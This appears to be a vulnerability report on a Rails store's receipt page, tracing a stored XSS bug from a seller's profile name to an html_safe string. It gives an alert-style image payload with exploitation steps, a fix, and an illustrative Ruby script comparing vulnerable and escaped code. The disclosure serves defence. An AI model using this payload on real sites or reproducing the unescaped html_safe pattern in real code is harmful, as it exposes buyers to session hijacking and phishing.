
Stored XSS via User Name in Receipt 'Product Questions' Note #4

@ghost

Description

Vulnerability: Stored Cross-Site Scripting (XSS)

Location: Receipt generation (Product Questions Note)

Source: User.name field (controllable by users/sellers via profile settings, e.g., /settings/profile).

Sink:

  1. The display_name method in /app/app/models/user.rb:408 returns the user's name if present.
  2. The product_questions_note method in /app/app/presenters/receipt_presenter/charge_info.rb:34 interpolates seller.display_name into a string containing a mail_to link.
  3. This entire string is marked html_safe ("#{question} #{action}".html_safe).
  4. The result is assigned to charge_info.product_questions_note.
  5. Because the string is already marked html_safe, the <%= charge_info.product_questions_note %> tag in /app/app/views/customer_mailer/receipt/sections/_items.html.erb:11 outputs it verbatim: ERB's automatic escaping is bypassed for SafeBuffer strings. This partial is part of the receipt email and web view.

Exploitation:

  1. A seller goes to their profile settings.
  2. They set their 'Name' field to an XSS payload, e.g., <img src=x onerror=alert('XSS-DisplayName')>.
  3. A user purchases a product from this seller.
  4. When the user views the receipt (web or email), the 'Questions about this product?' section renders the seller's name unsanitized, executing the script.

Impact: Allows sellers to execute arbitrary JavaScript in the context of buyers viewing receipts for their products. This can lead to session hijacking, phishing, or other attacks against buyers. Most mail clients strip script and event-handler attributes, so the web receipt view is the realistic execution context; the email copy still carries the injected markup.

Recommendation: HTML-escape seller.display_name before interpolating it into the string in charge_info.rb (ERB::Util.html_escape / h), or build the note from safe fragments (e.g. safe_join or tag helpers) so that only the mail_to markup the presenter itself generates is marked safe. Simply removing .html_safe is not sufficient on its own: the view would then escape the whole string, including the mail_to link, and render the anchor as literal text. Escaping the name before interpolation is the safest fix.
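The following is an added, stand-alone illustration of the vulnerable pattern beside the hardened form; it is not the project's presenter code. It uses ERB::Util.html_escape from the Ruby standard library in place of Rails' h helper, a hypothetical mail_to stand-in that escapes both the address and the link text (as Rails' helper does), and a constructed seller record whose name is the payload from the exploitation steps. The note text "Questions about this product?" is assumed from the section title above.

```ruby
require 'erb'

# Constructed sample data (not real accounts): a seller whose profile name
# is the XSS payload from the exploitation steps, and a benign seller whose
# name contains a character that must survive escaping intact.
MALICIOUS_SELLER = {
  name: "<img src=x onerror=alert('XSS-DisplayName')>",
  email: 'seller@example.com'
}.freeze
BENIGN_SELLER = { name: 'Ada & Co.', email: 'ada@example.com' }.freeze

# Hypothetical stand-in for Rails' mail_to helper: both the href and the
# visible text are HTML-escaped, so this fragment is safe to emit raw.
def mail_to(address, text)
  href = ERB::Util.html_escape(address)
  %(<a href="mailto:#{href}">#{ERB::Util.html_escape(text)}</a>)
end

# Vulnerable pattern: the seller's display name is interpolated unescaped
# into a string that the presenter then declares trusted (.html_safe in
# Rails). The view therefore emits the payload verbatim.
def product_questions_note_vulnerable(seller)
  question = 'Questions about this product?'
  action = "Contact #{seller[:name]} at #{mail_to(seller[:email], seller[:email])}"
  "#{question} #{action}" # .html_safe in the Rails original; treated as raw HTML
end

# Hardened pattern: escape the user-controlled name before interpolation, so
# the only unescaped markup left in the string is the mail_to anchor that the
# presenter built itself. Marking the result html_safe is then sound.
def product_questions_note_hardened(seller)
  question = 'Questions about this product?'
  safe_name = ERB::Util.html_escape(seller[:name])
  action = "Contact #{safe_name} at #{mail_to(seller[:email], seller[:email])}"
  "#{question} #{action}"
end

# Regression check: after removing the presenter's own anchor, any remaining
# '<' must have come from user input and indicates injected markup.
def contains_injected_markup?(html)
  html.gsub(%r{<a href="mailto:[^"]*">[^<]*</a>}, '').include?('<')
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{product_questions_note_vulnerable(MALICIOUS_SELLER)}"
  puts "hardened:   #{product_questions_note_hardened(MALICIOUS_SELLER)}"
  puts "injected?   #{contains_injected_markup?(product_questions_note_vulnerable(MALICIOUS_SELLER))} / " \
       "#{contains_injected_markup?(product_questions_note_hardened(MALICIOUS_SELLER))}"
end
```

The contains_injected_markup? check is the kind of assertion to put in a model or presenter spec for this bug: build a seller with a tag in the name, render the note, and fail if any tag other than the presenter's own mailto anchor survives.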
